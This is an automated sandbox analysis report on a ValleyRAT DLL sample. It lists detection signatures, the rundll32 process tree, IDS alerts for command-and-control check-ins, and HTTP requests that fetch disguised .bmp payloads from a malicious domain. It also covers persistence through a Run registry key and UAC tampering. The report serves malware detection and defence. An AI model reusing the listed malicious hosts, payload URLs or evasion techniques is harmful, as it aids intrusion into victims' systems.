Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0Gs0WEGB1E.dll

Overview

General Information

Sample name:0Gs0WEGB1E.dll
renamed because original name is a hash value
Original sample name:DF0DA14A75D792B85065BFABAAA38CA8.dll
Analysis ID:1581150
MD5:df0da14a75d792b85065bfabaaa38ca8
SHA1:242c2c510fab747f0d1ba8913adc500bab86e73e
SHA256:654f700f4315594fcd4297cbe4a793aa6487ae5060707164f47d6fc9735662cb
Tags:dllValleyRATuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to modify Windows User Account Control (UAC) settings
Disables UAC (registry)
Drops password protected ZIP file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7420 cmdline: loaddll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7472 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7496 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7480 cmdline: rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7568 cmdline: rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_scheme_handler_factories MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7612 cmdline: rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_command_line_create MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7644 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_cross_origin_whitelist MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7652 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_clear_scheme_handler_factories MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7660 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_command_line_create MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7676 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",you MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7692 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",create_context_shared MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7704 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_reader_create MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7712 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_zip_directory MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7720 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_write_json MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7736 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_window_create_top_level MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7748 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_visit_web_plugin_info MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7784 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_value_create MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7828 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_undefined MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7836 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_uint MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7864 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_string MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7872 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_object MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7880 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_null MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7908 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_int MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7916 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_function MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7924 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_double MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7932 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7940 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7952 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7960 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7972 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7988 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8036 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8052 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8060 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8068 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8084 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8096 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8112 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8120 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 8128 cmdline: rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\mRiZvH\RVQwATT.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-27T06:22:45.214141+010020528751A Network Trojan was detected192.168.2.449741202.79.172.477259TCP
2024-12-27T06:23:58.057946+010020528751A Network Trojan was detected192.168.2.449744202.79.172.477259TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://ad59t82g.com/2/text.bmpAvira URL Cloud: Label: phishing
Source: http://ad59t82g.com/LL6Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/2/t1.bmpC:Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/2/text.bmpMdAvira URL Cloud: Label: phishing
Source: http://ad59t82g.com/2/text.bmpHdAvira URL Cloud: Label: phishing
Source: http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/13;LYAvira URL Cloud: Label: phishing
Source: http://ad59t82g.com/79Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/f1Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/Avira URL Cloud: Label: phishing
Source: http://ad59t82g.com/79;LYAvira URL Cloud: Label: phishing
Source: http://ad59t82g.com/13LL6Avira URL Cloud: Label: phishing
Source: C:\Program Files (x86)\mRiZvH\t4d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
Source: 0Gs0WEGB1E.dllVirustotal: Detection: 42%Perma Link
Source: 0Gs0WEGB1E.dllReversingLabs: Detection: 55%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.9% probability
Source: 0Gs0WEGB1E.dllJoe Sandbox ML: detected
Source: 0Gs0WEGB1E.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: 0Gs0WEGB1E.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.10.dr
Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.10.dr

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49741 -> 202.79.172.47:7259
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49744 -> 202.79.172.47:7259
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.22.88 80Jump to behavior
Source: global trafficHTTP traffic detected: GET /2/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/t6.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 05:22:11 GMTContent-Type: image/x-ms-bmpContent-Length: 231953Connection: keep-aliveLast-Modified: Wed, 23 Oct 2024 16:12:10 GMTETag: "6719205a-38a11"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 0Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4k3nOfnwtLHAW7byKbv%2FDEHg%2FJ%2BEJ%2BcD3bC2FZEFC9GSTV5VZu4w0pKv98BwUfNgSja1ACfRYVGwMnoiB1GUYWzufAtJPxCHsB5zNzvYpjytsvWJ2bvNT5%2Bfl5FsCM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f86df15fe557d1e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4162&min_rtt=1971&rtt_var=5122&sent=3&recv=5&lost=0&retrans=0&sent_bytes=878&recv_bytes=231&delivery_rate=74864&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 50 4b 03 04 14 00 00 00 00 00 96 01 58 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 db 90 19 67 db 90 19 67 db 90 19 67 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 2c 20 19 67 2b 56 ec 66 35 4f c3 bc f1 a4 c9 bd bc 14 31 c4 75 15 bd d3 c2 29 19 ce 46 a8 0f 81 13 8a 36 76 a0 c2 69 4e 21 8d fd af 43 4d 7d 85 2f fe b7 d9 51 87 b4 70 3f cc fe df 07 83 b0 14 fb 19 76 09 f7 fd 17 5a cf 66 a2 68 ea fc 06 45 d9 8a fc 4b 22 55 b9 07 6b 4e 37 ca 74 20 84 7b f1 5a 03 94 5c 32 dc bb 83 8f db 28 72 e6 a5 5f ec 88 20 42 62 fd f2 54 09 93 bb 9e 0f 9d 99 3d 0d e5 f2 d4 c8 c2 d6 bb de a9 99 88 7d d1 da fb 78 82 3c b4 34 11 96 11 3d 77 ee a9 56 71 c3 c7 43 4e fe a2 03 14 94 ca dd 32 11 87 06 80 6b 76 93 80 bf 83 58 1d 72 37 60 b9 1d 0c b1 ca c8 da f5 33 92 a9 f9 e6 d9 ac 62 c8 11 ee 6b 1c 1d 72 e8 f1 b4 73 95 e8 7b 7b 90 aa 4f da 00 c3 3b 3c 86 5d 85 f0 Data Ascii: PKXYtext/UTgggPK7Xxtext/MSVCP140.dllUTe, g+Vf5O1u)F6viN!CM}/Qp?vZfhEK"UkN7t {Z\2(r_ BbT=}x<4=wVqCN2kvXr7`3bkrs{{O;<]
Source: global trafficHTTP traffic detected: GET /2/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficHTTP traffic detected: GET /2/t6.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
Source: global trafficDNS traffic detected: DNS query: ad59t82g.com
Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1867581832.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/
Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/13;LY
Source: rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/13LL6
Source: rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/2/d.bmpbthttp://ad59t82g.com/2/t6.bmphttp://ad59t82g.com/2/text.bmpC:
Source: rundll32.exe, 0000000A.00000002.2083571808.0000000002DD7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/2/t1.bmpC:
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/2/text.bmp
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/2/text.bmpHd
Source: rundll32.exe, 0000000A.00000003.1805543370.000000000323F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/2/text.bmpMd
Source: rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/79
Source: rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/79;LY
Source: rundll32.exe, 0000000A.00000003.1805751796.000000000324F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1805543370.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/LL6
Source: rundll32.exe, 0000000A.00000003.1834552528.0000000003251000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1876290454.0000000003251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/f1
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drString found in binary or memory: http://crl.wosign.com/WoSignCodeSigning.crl0G
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drString found in binary or memory: http://crt.wosign.com/WoSignCodeSigning.crt0
Source: FileSystem_Stdio.dll.10.drString found in binary or memory: http://www.astro.com/swisseph.
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: http://www.astrolog.org/astrolog.htm
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: http://www.astrolog.org/astrolog.htmMain
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drString found in binary or memory: http://www.dokee.cn
Source: FileSystem_Stdio.dll.10.drString found in binary or memory: http://www.gnu.org
Source: rundll32.exe, 0000000A.00000003.1887006982.00000000051B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1887027730.00000000051AF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1886966921.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, RVQwATT.exe.10.drString found in binary or memory: http://www.wosign.com/cps/0
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.html
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: https://www.geonames.org/
Source: rundll32.exe, 0000000A.00000003.1925312583.0000000005547000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.2052463388.0000000005409000.00000004.00000020.00020000.00000000.sdmp, FileSystem_Stdio.dll.10.drString found in binary or memory: https://www.geonames.org/Timezone

System Summary

barindex
Source: t3d.tmp.10.drZip Entry: encrypted
Source: t3d.tmp.10.drZip Entry: encrypted
Source: t3d.tmp.10.drZip Entry: encrypted
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E346A920_2_6E346A92
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E345B2D0_2_6E345B2D
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3373110_2_6E337311
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E344F000_2_6E344F00
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33886F0_2_6E33886F
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3454510_2_6E345451
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3369760_2_6E336976
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3361760_2_6E336176
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3449AF0_2_6E3449AF
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E33BDE00_2_6E33BDE0
Source: 0Gs0WEGB1E.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engineClassification label: mal100.evad.winDLL@112/8@1/1
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E331772 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,0_2_6E331772
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3318A0 AdjustTokenPrivileges,0_2_6E3318A0
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3318EA LookupPrivilegeValueA,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,OpenProcess,OpenProcessToken,CloseHandle,LookupPrivilegeValueA,AdjustTokenPrivileges,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,LookupPrivilegeValueA,GetLengthSid,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,0_2_6E3318EA
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3317FE CreateToolhelp32Snapshot,_memset,Process32FirstW,lstrcmpiW,Process32NextW,CloseHandle,0_2_6E3317FE
Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E3332BD _memset,Sleep,_memset,Sleep,_memset,_memset,__time64,_memset,_rand,_rand,Sleep,Sleep,_memset,wsprintfA,_memset,Sleep,MakeSureDirectoryPathExists,Sleep,_memset,wsprintfA,Sleep,GetFileAttributesA,SetFileAttributesA,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,_memset,wsprintfA,_memset,Sleep,Sleep,Sleep,Sleep,__time64,_memset,_rand,_memset,wsprintfA,wsprintfA,_memset,wsprintfA,Sleep,Sleep,Sleep,_memset,_mbstowcs,_memset,_memset,_strcat_s,FindWindowExA,Sleep,SysAllocString,SysAllocString,SysAllocString,Sleep,GlobalAddAtomA,FindWindowA,FindWindowA,PostMessageA,PostMessageA,PostMessageA,FindWindowA,PostMessageA,_memset,_memset,_memset,_memset,_mbstowcs,_memset,_memset,_memset,_strcat_s,FindWindowExA,Sleep,CoInitializeEx,CoCreateInstance,CoUninitialize,_memset,LoadLibraryA,_memset,GetProcAddress,_memset,Sleep,Sleep,Sleep,Sleep,Sleep,_memset,LoadLibraryA,_memset,GetProcAddress,_memset,_memset,wsprintfA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,0_2_6E3332BD
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Program Files (x86)\mRiZvHJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03
Source: 0Gs0WEGB1E.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist
Source: 0Gs0WEGB1E.dllVirustotal: Detection: 42%
Source: 0Gs0WEGB1E.dllReversingLabs: Detection: 55%
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0Gs0WEGB1E.dll,cef_clear_cross_origin_whitelist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",#1
